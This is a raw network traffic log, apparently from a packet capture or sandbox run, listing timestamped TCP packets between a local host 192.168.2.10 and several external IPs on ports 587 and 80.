                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.405448914 CET805006847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.405477047 CET805006847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.487951994 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.488204956 CET50063587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.518420935 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.518500090 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.518765926 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.518812895 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.608238935 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.638828039 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.638860941 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.663777113 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.665487051 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.785605907 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.891083956 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.893573046 CET50063587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.015075922 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.073806047 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.077523947 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.197635889 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.300482035 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.300772905 CET50063587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.420887947 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.490907907 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.491339922 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.611439943 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.703717947 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.704185963 CET50063587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.704185963 CET50063587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.704257011 CET50063587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.704428911 CET50063587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.705635071 CET50063587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.824418068 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:29.824460030 CET5875006351.195.88.199192.168.2.10
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 26, 2024 08:15:29.824470043 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.824476004 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.824480057 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.824531078 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.825706005 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.825757980 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.825764894 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.825815916 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.825854063 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.825865030 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.825880051 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.825897932 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.825900078 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.825932980 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.825956106 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.825982094 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.825992107 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.826021910 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.826045990 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.826045990 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.826069117 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.900177956 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.900479078 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.900510073 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.900568962 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.900595903 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.902021885 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.944626093 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.944694042 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.944700956 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.944739103 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.945688009 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.945740938 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.945888996 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.945940018 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.946078062 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.946142912 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.946154118 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.946187019 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.946203947 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.946225882 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.946264982 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.946310997 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.946331978 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.946373940 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.946407080 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.946449995 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.946474075 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.946523905 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:29.990959883 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:29.991015911 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:30.020767927 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.020785093 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.020812035 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.020828009 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:30.020855904 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.020908117 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:30.022058964 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.022129059 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:30.064728022 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.064778090 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.064784050 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:30.064788103 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.064830065 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:30.064886093 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.064949036 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:30.065635920 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.065685987 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:30.065711975 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.065752029 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:30.065826893 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.065864086 CET  587          50064      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.065869093 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:30.065915108 CET  50064        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:30.066045046 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.066090107 CET  50063        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:15:30.066162109 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.066344976 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.066405058 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.066493034 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.066623926 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.066703081 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.066848040 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.066896915 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.066977978 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.067034006 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.067131996 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.067142010 CET  587          50063      51.195.88.199   192.168.2.10
Nov 26, 2024 08:15:30.067265987 CET  587          50063      51.195.88.199   192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.067276955 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.067344904 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.067353964 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.067421913 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.067430973 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.067517042 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.067537069 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.067600012 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.067609072 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.140722990 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.140742064 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.140759945 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.140778065 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.140896082 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.140959024 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.141051054 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.142028093 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.142085075 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.185450077 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.185507059 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.185533047 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.185579062 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.185587883 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.185642958 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.185656071 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.185684919 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.185695887 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.185735941 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.186294079 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.186347961 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.186388016 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.186431885 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.186583042 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.186628103 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.186742067 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.186794043 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.186883926 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.186903954 CET5875006351.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.227062941 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.227150917 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.261219025 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.261302948 CET50064587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.262135983 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.305685043 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.305774927 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.305855036 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.305923939 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306071997 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306124926 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306220055 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306363106 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306412935 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306503057 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306581020 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306653023 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306665897 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306770086 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306778908 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306819916 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306901932 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306962013 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.306969881 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.307024956 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.307034969 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.307116985 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.307126045 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.307167053 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.348522902 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.348606110 CET5875006451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.108472109 CET5007480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.108525991 CET5007480192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.228559971 CET805007447.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.259082079 CET5007680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.379352093 CET805007613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.379440069 CET5007680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.379837036 CET5007680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.379878998 CET5007680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.476978064 CET5007780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.500494957 CET805007613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.500571012 CET805007613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.597287893 CET805007718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.597377062 CET5007780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.597898960 CET5007780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.598141909 CET5007780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.718636036 CET805007718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.718672037 CET805007718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.005498886 CET805007718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.005525112 CET805007718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.005595922 CET5007780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.005698919 CET5007780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.125751972 CET805007718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.486525059 CET805007613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.486597061 CET805007613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.486643076 CET5007680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.486855984 CET5007680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.567435980 CET5007880192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.606794119 CET805007613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.640830994 CET5007980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.687871933 CET80500783.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.691400051 CET5007880192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.691596031 CET5007880192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.691596031 CET5007880192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.762419939 CET805007934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.767318964 CET5007980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.770020962 CET5007980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.770020962 CET5007980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.813127995 CET80500783.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.813297987 CET80500783.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.892498970 CET805007934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.892507076 CET805007934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.122401953 CET80500783.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.122422934 CET80500783.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.122484922 CET5007880192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.122915030 CET5007880192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.207277060 CET805007934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.207325935 CET805007934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.207396030 CET5007980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.207545042 CET5007980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.242825031 CET80500783.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.327595949 CET805007934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.355633974 CET5008080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.476661921 CET80500803.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.476815939 CET5008080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.477217913 CET5008080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.477241993 CET5008080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.597220898 CET80500803.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.597496986 CET80500803.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.185609102 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.305999994 CET805008185.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.306232929 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.306483984 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.306483984 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.426507950 CET805008185.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.426520109 CET805008185.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.573230028 CET80500803.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.573256016 CET80500803.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.573416948 CET5008080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.574062109 CET5008080192.168.2.103.94.10.34
Nov 26, 2024 08:15:42.694071054 CET  80     50080  3.94.10.34       192.168.2.10
Nov 26, 2024 08:15:42.746217012 CET  50082  80     192.168.2.10     18.246.231.120
Nov 26, 2024 08:15:42.866378069 CET  80     50082  18.246.231.120   192.168.2.10
Nov 26, 2024 08:15:42.869461060 CET  50082  80     192.168.2.10     18.246.231.120
Nov 26, 2024 08:15:43.124553919 CET  50082  80     192.168.2.10     18.246.231.120
Nov 26, 2024 08:15:43.124608994 CET  50082  80     192.168.2.10     18.246.231.120
Nov 26, 2024 08:15:43.244750977 CET  80     50082  18.246.231.120   192.168.2.10
Nov 26, 2024 08:15:43.244780064 CET  80     50082  18.246.231.120   192.168.2.10
Nov 26, 2024 08:15:43.569173098 CET  80     50081  85.214.228.140   192.168.2.10
Nov 26, 2024 08:15:43.572458029 CET  50081  80     192.168.2.10     85.214.228.140
